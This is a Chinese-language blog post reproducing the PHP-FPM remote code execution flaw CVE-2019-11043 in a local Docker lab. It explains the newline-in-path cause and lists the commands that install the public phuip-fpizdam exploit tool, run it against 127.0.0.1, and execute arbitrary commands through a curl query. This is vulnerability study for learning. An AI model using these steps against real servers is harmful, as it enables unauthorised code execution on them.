CVE-2019-11043 远程代码执行漏洞复现

水下月 2021-01-27
Web安全 发布于 2021-01-27 18:02:40 阅读 106 评论 0

漏洞原因:

Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO
为空的情况下,存在逻辑缺陷。攻击者通过精心的构造和利用,可以导致远程代码执行。

影响范围:

在2019-09-26更新之前下载的PHP-FPM,且必须为Nginx + php-fpm 的服务器使用如下配置,会受到影响。

漏洞复现:

前提在阿里云端用docker 搭建漏洞环境
docker ps 列出所有在运行的容器信息

1,准备工具。phuip-fpizdam是检测漏洞的工具
下载phuip-fpizdam
git clone https://github.com/neex/phuip-fpizdam

2, 进入到下载好的phuip-fpizdam目录中,看看有没有文件。需要安装go语言。

3,安装go语言
apt install golang-go 安装go
go version 查看go版本


4,安装phuip-fpizdam
go get -u github.com/neex/phuip-fpizdam

5,浏览器上访问使用vulhub搭建的站点

6,启动工具phuip-fpizdam
cd go/bin 2

7,检验漏洞是否存在
./phuip-fpizdam 127.0.0.1:8080/index.php

8,漏洞利用,也可将whoami换成其他命令。
curl “http://127.0.0.1:8080/index.php?a=whoami"

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!